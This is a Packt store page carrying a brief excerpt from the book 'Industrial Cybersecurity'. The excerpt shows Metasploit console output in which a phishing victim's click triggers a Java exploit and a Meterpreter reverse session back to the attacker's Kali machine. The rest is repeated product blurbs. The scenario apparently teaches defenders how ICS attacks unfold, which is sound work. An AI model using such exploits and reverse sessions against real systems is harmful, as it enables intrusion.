Packt+ | Advance your knowledge in tech

0

Explore Products

Best Sellers

New Releases

Books

Videos

Audiobooks

Free Learning

Industrial Cybersecurity

You're reading from Industrial Cybersecurity Efficiently secure critical infrastructure systems

Product type Paperback

Published in Oct 2017

Publisher Packt

ISBN-13 9781788395151

Length 456 pages

Edition 1st Edition

Concepts

Cybersecurity

Author (1):

Pascal Ackerman

View More author details

Table of Contents (13) Chapters

Preface

1. Industrial Control Systems

2. Insecure by Inheritance FREE CHAPTER

3. Anatomy of an ICS Attack Scenario

4. Industrial Control System Risk Assessment

5. The Purdue Model and a Converged Plantwide Ethernet

6. The Defense-in-depth Model

7. Physical ICS Security

8. ICS Network Security

9. ICS Computer Security

10. ICS Application Security

11. ICS Device Security

12. The ICS Cybersecurity Program Development Process

What can the attacker do with their access?

After Mark clicks on the link in the email, we send him the following messages, which appear in the Metasploit handler screen on the Kali Linux VM:

msf exploit(java_atomicreferencearray) >
[*] 122.10.10.10     java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 122.10.10.10     java_atomicreferencearray - Generated jar to drop (5122 bytes).
[*] 122.10.10.10     java_atomicreferencearray - Sending jar
[*] 122.10.10.10     java_atomicreferencearray - Sending jar
[*] Sending stage (49645 bytes) to 122.10.10.10
[*] Meterpreter session 2 opened (122.10.10.222:4444 -> 122.10.10.10:25554) at 2017-06-04 09:20:37 -0400

What is shown here is the establishment of a Meterpreter session between the attacker computer and the victim. Metasploit uploaded a custom Java application JAR file to Mark's computer and the Java application connected back to the Kali Linux machine to establish a Meterpreter command session...

The rest of the chapter is locked

Register for a free Packt account to unlock a world of extra content!

A free Packt account unlocks extra newsletters, articles, discounted offers, and much more. Start advancing your knowledge today.

Unlock this book and the full library FREE for 7 days

Get unlimited access to 7000+ expert-authored eBooks and videos courses covering every tech area you can think of

Start free trial

Renews at $19.99/month. Cancel anytime

Authors (1)

Pascal Ackerman

Pascal Ackerman

Pascal Ackerman is a seasoned industrial security professional with a degree in electrical engineering and over 20 years of experience in industrial network design and support, information and network security, risk assessments, pentesting, threat hunting, and forensics. After almost two decades of hands-on, in-the-field, and consulting experience, he joined ThreatGEN in 2019 and is currently employed as managing director of threat services and research. His passion lies in analyzing new and existing threats to ICS environments and he fights cyber adversaries both from his home base and while traveling the world with his family as a digital nomad. Pascal wrote the previous edition of this book and has been a reviewer and technical consultant of many security books.

See other products by Pascal Ackerman

Other recommended products

Related to this chapter

Metasploit Penetration Testing Cookbook

Metasploit Penetration Testing Cookbook

Metasploit is the world's leading penetration testing tool and helps security and IT professionals find, exploit, and validate vulnerabilities. Metasploit allows penetration testing automation, password auditing, web application scanning, social engineering, post exploitation, evidence collection, and reporting. Metasploit's integration with InsightVM (or Nexpose), Nessus, OpenVas, and other vulnerability scanners provides a validation solution that simplifies vulnerability prioritization and remediation reporting. Teams can collaborate in Metasploit and present their findings in consolidated reports.

Feb 2018 14h 12m

Metasploit Penetration Testing Cookbook

Metasploit Penetration Testing Cookbook

Metasploit is the world's leading penetration testing tool and helps security and IT professionals find, exploit, and validate vulnerabilities. Metasploit allows penetration testing automation, password auditing, web application scanning, social engineering, post exploitation, evidence collection, and reporting. Metasploit's integration with InsightVM (or Nexpose), Nessus, OpenVas, and other vulnerability scanners provides a validation solution that simplifies vulnerability prioritization and remediation reporting. Teams can collaborate in Metasploit and present their findings in consolidated reports.

Feb 2018 14h 12m

Metasploit Penetration Testing Cookbook

Metasploit Penetration Testing Cookbook

Metasploit is the world's leading penetration testing tool and helps security and IT professionals find, exploit, and validate vulnerabilities. Metasploit allows penetration testing automation, password auditing, web application scanning, social engineering, post exploitation, evidence collection, and reporting. Metasploit's integration with InsightVM (or Nexpose), Nessus, OpenVas, and other vulnerability scanners provides a validation solution that simplifies vulnerability prioritization and remediation reporting. Teams can collaborate in Metasploit and present their findings in consolidated reports.

Feb 2018 14h 12m

Metasploit Penetration Testing Cookbook

Metasploit Penetration Testing Cookbook

Metasploit is the world's leading penetration testing tool and helps security and IT professionals find, exploit, and validate vulnerabilities. Metasploit allows penetration testing automation, password auditing, web application scanning, social engineering, post exploitation, evidence collection, and reporting. Metasploit's integration with InsightVM (or Nexpose), Nessus, OpenVas, and other vulnerability scanners provides a validation solution that simplifies vulnerability prioritization and remediation reporting. Teams can collaborate in Metasploit and present their findings in consolidated reports.

Feb 2018 14h 12m

Metasploit Penetration Testing Cookbook

Metasploit Penetration Testing Cookbook

Metasploit is the world's leading penetration testing tool and helps security and IT professionals find, exploit, and validate vulnerabilities. Metasploit allows penetration testing automation, password auditing, web application scanning, social engineering, post exploitation, evidence collection, and reporting. Metasploit's integration with InsightVM (or Nexpose), Nessus, OpenVas, and other vulnerability scanners provides a validation solution that simplifies vulnerability prioritization and remediation reporting. Teams can collaborate in Metasploit and present their findings in consolidated reports.

Feb 2018 14h 12m

Learning RSLogix 5000 Programming

Learning RSLogix 5000 Programming

RSLogix 5000 and Studio 5000's Logix Designer are user-friendly interfaces used to program the Rockwell Automation controllers. This book will begin by introducing you to the Logix Platform and Rockwell Automation terminologies and will help you build real-world solutions using RSLogix 5000, ControlLogix, CompactLogix and Studio 5000.

Jul 2020 12h 48m

Learning RSLogix 5000 Programming

Learning RSLogix 5000 Programming

RSLogix 5000 and Studio 5000's Logix Designer are user-friendly interfaces used to program the Rockwell Automation controllers. This book will begin by introducing you to the Logix Platform and Rockwell Automation terminologies and will help you build real-world solutions using RSLogix 5000, ControlLogix, CompactLogix and Studio 5000.

Jul 2020 12h 48m

Learning RSLogix 5000 Programming

Learning RSLogix 5000 Programming

RSLogix 5000 and Studio 5000's Logix Designer are user-friendly interfaces used to program the Rockwell Automation controllers. This book will begin by introducing you to the Logix Platform and Rockwell Automation terminologies and will help you build real-world solutions using RSLogix 5000, ControlLogix, CompactLogix and Studio 5000.

Jul 2020 12h 48m

Learning RSLogix 5000 Programming

Learning RSLogix 5000 Programming

RSLogix 5000 and Studio 5000's Logix Designer are user-friendly interfaces used to program the Rockwell Automation controllers. This book will begin by introducing you to the Logix Platform and Rockwell Automation terminologies and will help you build real-world solutions using RSLogix 5000, ControlLogix, CompactLogix and Studio 5000.

Jul 2020 12h 48m

Learning RSLogix 5000 Programming

Learning RSLogix 5000 Programming

RSLogix 5000 and Studio 5000's Logix Designer are user-friendly interfaces used to program the Rockwell Automation controllers. This book will begin by introducing you to the Logix Platform and Rockwell Automation terminologies and will help you build real-world solutions using RSLogix 5000, ControlLogix, CompactLogix and Studio 5000.

Jul 2020 12h 48m

Learning RSLogix 5000 Programming

Learning RSLogix 5000 Programming

RSLogix 5000 and Studio 5000's Logix Designer are user-friendly interfaces used to program the Rockwell Automation controllers. This book will begin by introducing you to the Logix Platform and Rockwell Automation terminologies and will help you build real-world solutions using RSLogix 5000, ControlLogix, CompactLogix and Studio 5000.

Jul 2020 12h 48m

Learning RSLogix 5000 Programming

Learning RSLogix 5000 Programming

RSLogix 5000 and Studio 5000's Logix Designer are user-friendly interfaces used to program the Rockwell Automation controllers. This book will begin by introducing you to the Logix Platform and Rockwell Automation terminologies and will help you build real-world solutions using RSLogix 5000, ControlLogix, CompactLogix and Studio 5000.

Jul 2020 12h 48m

Personalised recommendations for you

Based on your interests and search pattern

The Aspiring CIO and CISO

The Aspiring CIO and CISO

This book helps entry, mid-level, and senior managers master soft skills, craft a compelling brand, and strategically plan their career in C-suite roles with the help of expert insights needed for success in digital leadership and executive roles.

Jun 2024 8h 32m

The Aspiring CIO and CISO

The Aspiring CIO and CISO

This book helps entry, mid-level, and senior managers master soft skills, craft a compelling brand, and strategically plan their career in C-suite roles with the help of expert insights needed for success in digital leadership and executive roles.

Jun 2024 8h 32m

The Aspiring CIO and CISO

The Aspiring CIO and CISO

This book helps entry, mid-level, and senior managers master soft skills, craft a compelling brand, and strategically plan their career in C-suite roles with the help of expert insights needed for success in digital leadership and executive roles.

Jun 2024 8h 32m

The Aspiring CIO and CISO

The Aspiring CIO and CISO

This book helps entry, mid-level, and senior managers master soft skills, craft a compelling brand, and strategically plan their career in C-suite roles with the help of expert insights needed for success in digital leadership and executive roles.

Jun 2024 8h 32m

The Aspiring CIO and CISO

The Aspiring CIO and CISO

This book helps entry, mid-level, and senior managers master soft skills, craft a compelling brand, and strategically plan their career in C-suite roles with the help of expert insights needed for success in digital leadership and executive roles.

Jun 2024 8h 32m

The Aspiring CIO and CISO

The Aspiring CIO and CISO

This book helps entry, mid-level, and senior managers master soft skills, craft a compelling brand, and strategically plan their career in C-suite roles with the help of expert insights needed for success in digital leadership and executive roles.

Jun 2024 8h 32m

The Aspiring CIO and CISO

The Aspiring CIO and CISO

This book helps entry, mid-level, and senior managers master soft skills, craft a compelling brand, and strategically plan their career in C-suite roles with the help of expert insights needed for success in digital leadership and executive roles.

Jun 2024 8h 32m

Malware Development for Ethical Hackers

Malware Development for Ethical Hackers

This book will help you understand malware development by delving into the intricate mechanisms of malware development, injection attacks, and advanced evasion strategies with over 80 real-life examples.

Jun 2024 13h 0m

Malware Development for Ethical Hackers

Malware Development for Ethical Hackers

This book will help you understand malware development by delving into the intricate mechanisms of malware development, injection attacks, and advanced evasion strategies with over 80 real-life examples.

Jun 2024 13h 0m

Malware Development for Ethical Hackers

Malware Development for Ethical Hackers

This book will help you understand malware development by delving into the intricate mechanisms of malware development, injection attacks, and advanced evasion strategies with over 80 real-life examples.

Jun 2024 13h 0m

Malware Development for Ethical Hackers

Malware Development for Ethical Hackers

This book will help you understand malware development by delving into the intricate mechanisms of malware development, injection attacks, and advanced evasion strategies with over 80 real-life examples.

Jun 2024 13h 0m

Malware Development for Ethical Hackers

Malware Development for Ethical Hackers

This book will help you understand malware development by delving into the intricate mechanisms of malware development, injection attacks, and advanced evasion strategies with over 80 real-life examples.

Jun 2024 13h 0m